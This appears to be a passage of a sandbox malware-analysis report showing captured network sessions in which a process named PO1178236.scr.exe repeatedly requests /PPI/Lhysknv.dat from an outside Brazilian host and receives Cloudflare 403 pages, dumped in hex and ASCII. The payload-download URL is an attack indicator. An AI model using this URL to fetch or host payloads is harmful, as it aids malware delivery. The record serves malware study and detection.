        2025-01-09 07:36:17 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:17 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 36 33 38 61 33 36 34 32 62 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1638a3642b0</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:17 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 36 33 38 61 33 36 34 32 62 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 79 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1638a3642b0',t:'MTczNjQwODE3Ny4wMDAwMDA=
        2025-01-09 07:36:17 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        35192.168.2.949743188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:17 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:17 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:17 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:32 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D5uxK3MptTgGk%2FlP%2BI31ZrThrZ%2Bkght04%2FQ%2FYOTQGsZDA0%2FxhbQ1Mo0HU1OMGbkYb3i%2BsmEJn1WdCaPrqvB0lRgXNQBSUupiNGiabI%2Bb0zVrDvlqrPCsNTDJWv7ZCtsq9pFPR33IA4S9mWC2"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c167389d426d-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1650&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1660978&cwnd=230&unsent_bytes=0&cid=f25990a1a3c51c2c&ts=129&x=0"
        2025-01-09 07:36:17 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:17 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:36:17 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:36:17 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 36 37 33 38 39 64 34 32 36 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c167389d426d</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:36:17 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 36 37 33 38 39 64 34 32 36 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4e 79 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c167389d426d',t:'MTczNjQwODE3Ny4wMDAwMD
        2025-01-09 07:36:17 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        36192.168.2.949744188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:18 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:18 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:18 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:33 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZbshXvlc0zj5E5hhgB%2FwRy8kontQKDfbc%2BDdlGMsa8NPmnObiurX%2FTGiVhSrOoy%2BwdoekWytJY%2FxY1THpl9%2BMPfVqQlEGDYktMBMUJufhBbEvfQxIjyUWvCT7XjncDxdrlBEOJykuPB0nZ%2F"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c16beac11821-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1686&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1728833&cwnd=242&unsent_bytes=0&cid=bd0f47285583b778&ts=290&x=0"
        2025-01-09 07:36:18 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:18 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:18 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:18 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 36 62 65 61 63 31 31 38 32 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c16beac11821</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:18 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 36 62 65 61 63 31 31 38 32 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4f 43 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c16beac11821',t:'MTczNjQwODE3OC4wMDAwMDA=
        2025-01-09 07:36:18 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        37192.168.2.949745188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:19 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:19 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:19 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:34 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6sb0v1vHxI9e2vU07Egvy7G5OyZD7w5OZImwIRfYP12%2BMEJ07o4dX%2FStdNc0wXvDayvVHWWrHdIHegaqL3vqreyeUMxJNPsjueHRse%2FZqVRXE4fOn4h%2B1KN8MYONifIMXkYerG6R9r9H2yEN"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c16fbbdf431a-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2082&rtt_var=787&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1402497&cwnd=224&unsent_bytes=0&cid=e7753d828ebfcd40&ts=145&x=0"
        2025-01-09 07:36:19 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:19 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:19 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:19 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 36 66 62 62 64 66 34 33 31 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 